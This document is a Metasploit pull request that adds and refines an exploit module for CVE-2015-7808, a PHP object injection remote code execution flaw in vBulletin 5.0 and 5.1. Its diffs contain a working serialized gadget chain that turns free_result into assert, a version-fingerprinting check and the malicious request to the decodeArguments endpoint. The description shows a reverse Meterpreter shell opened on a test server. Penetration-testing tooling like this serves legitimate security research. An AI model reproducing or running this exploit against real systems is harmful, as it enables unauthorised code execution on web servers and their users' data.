### PR TITLE
Implement a module for the recent vBulletin RCE

### DIFF
--- a/modules/exploits/unix/webapp/vbulletin_unserialize.rb
+++ b/modules/exploits/unix/webapp/vbulletin_unserialize.rb
@@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'     =>
         [
           ['CVE', '2015-7808'],
+          ['EDB', '38629'],
           ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],
           ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
         ],

--- a/modules/exploits/unix/webapp/vbulletin_unserialize.rb
+++ b/modules/exploits/unix/webapp/vbulletin_unserialize.rb
@@ -33,6 +33,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'Targets'        => [['vBulletin 5.1.2', {}]],
       'DisclosureDate' => 'Nov 4 2015',
       'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
+        ], self.class)
   end
 
   def check

--- a/modules/exploits/unix/webapp/vbulletin_unserialize.rb
+++ b/modules/exploits/unix/webapp/vbulletin_unserialize.rb
@@ -23,6 +23,10 @@ class Metasploit3 < Msf::Exploit::Remote
           'cutz',  # original exploit
           'Julien (jvoisin) Voisin',  # metasploit module
       ],
+      'Payload'        =>
+        {
+          'BadChars'    => "\x22",
+        },
       'References'     =>
         [
           ['CVE', '2015-7808'],

--- a/modules/exploits/unix/webapp/vbulletin_unserialize.rb
+++ b/modules/exploits/unix/webapp/vbulletin_unserialize.rb
@@ -35,7 +35,11 @@ class Metasploit3 < Msf::Exploit::Remote
           ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
         ],
       'Arch'           => ARCH_PHP,
-      'Targets'        => [['vBulletin 5.1.2', {}]],
+      'Targets'        => [
+          [ 'Automatic Targeting', { 'auto' => true }  ],
+          ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],
+          ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],
+      ],
       'DisclosureDate' => 'Nov 4 2015',
       'DefaultTarget'  => 0))
 
@@ -46,18 +50,45 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    res = send_request_cgi({ 'uri' => target_uri.path })
-    if (res && res.body.include?("Version 5.1.") && res.body.include?('Copyright &copy; 2015 vBulletin Solutions, Inc.'))
-      return Exploit::CheckCode::Appears
-    else
-      return Exploit::CheckCode::Unknown
-    end
-    Exploit::CheckCode::Safe
+      begin
+          res = send_request_cgi({ 'uri' => target_uri.path })
+          if (res && res.body.include?('vBulletin Solutions, Inc.'))
+              if res.body.include?("Version 5.0")
+                  @my_target = targets[1] if target['auto']
+                  return Exploit::CheckCode::Appears
+              elsif res.body.include?("Version 5.1")
+                  @my_target = targets[2] if target['auto']
+                  return Exploit::CheckCode::Appears
+              else
+                  return Exploit::CheckCode::Detected
+              end
+          end
+      rescue ::Rex::ConnectionError
+          return Exploit::CheckCode::Safe
+      end
   end
 
   def exploit
+    print_status("#{peer} - Trying to inferprint the instance...")
 
-    chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:18:"vB_Database_MySQLi":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:'
+    @my_target = target
+    check_code = check
+
+    unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
+      fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable instance")
+    end
+
+    if @my_target.nil? || @my_target['auto']
+      fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
+    end
+
+    print_status("#{peer} - Exploiting #{@my_target.name}...")
+
+    chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:'
+    chain << @my_target["chain"].length.to_s
+    chain << ':"'
+    chain << @my_target["chain"]
+    chain << '":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:'
     chain << "#{payload.encoded.length}:\"#{payload.encoded}\";}"
 
     chain = Rex::Text.uri_encode(chain)

--- a/modules/exploits/unix/webapp/vbulletin_unserialize.rb
+++ b/modules/exploits/unix/webapp/vbulletin_unserialize.rb
@@ -1,0 +1,65 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'vBulletin 5.1.2 Unserialize Code Execution',
+      'Description'    => %q{
+        This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9
+      },
+      'Platform'       => 'php',
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+          'Netanel Rubin',  # reported by
+          'cutz',  # original exploit
+          'Julien (jvoisin) Voisin',  # metasploit module
+      ],
+      'References'     =>
+        [
+          ['CVE', '2015-7808'],
+          ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],
+          ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
+        ],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['vBulletin 5.1.2', {}]],
+      'DisclosureDate' => 'Nov 4 2015',
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    res = send_request_cgi({ 'uri' => '/' })
+    if (res && res.body =~ /Version 5.1./ && res.body =~ /Copyright &copy; 2015 vBulletin Solutions, Inc./)
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Unknown
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+
+    chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:18:"vB_Database_MySQLi":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:'
+    chain << "#{payload.encoded.length}:\"#{payload.encoded}\";}"
+
+    chain = Rex::Text.uri_encode(chain)
+    chain = chain.gsub(/%2a/, '%00%2a%00')  # php and Rex disagree on '*' encoding
+
+    res = send_request_cgi({
+        'method' => 'GET',
+        'uri'       => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'),
+        'vars_get' => {
+            'arguments' => chain
+      },
+       'encode_params' => false,
+    })
+  end
+end

--- a/modules/exploits/unix/webapp/vbulletin_unserialize.rb
+++ b/modules/exploits/unix/webapp/vbulletin_unserialize.rb
@@ -46,8 +46,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    res = send_request_cgi({ 'uri' => '/' })
-    if (res && res.body =~ /Version 5.1./ && res.body =~ /Copyright &copy; 2015 vBulletin Solutions, Inc./)
+    res = send_request_cgi({ 'uri' => target_uri.path })
+    if (res && res.body.include?("Version 5.1.") && res.body.include?('Copyright &copy; 2015 vBulletin Solutions, Inc.'))
       return Exploit::CheckCode::Appears
     else
       return Exploit::CheckCode::Unknown


### PR DESCRIPTION
This module implements the recent unserialize-powered RCE against [vBulletin](https://www.vbulletin.com/) 5.1.X

Step to reproduce:
1. Install vBulletin 5.1.X (It's not a free software, you have to buy it)
2. Launch the exploit against it

```
msf exploit(vbulletin_unserialize) > check
[*] 192.168.1.25:80 - The target appears to be vulnerable.
msf exploit(vbulletin_unserialize) >
```

```
msf exploit(vbulletin) > run

[*] Started reverse handler on 192.168.1.11:4444
[*] Sending stage (33068 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100

meterpreter > getuid
Server username: www-data (33)
```
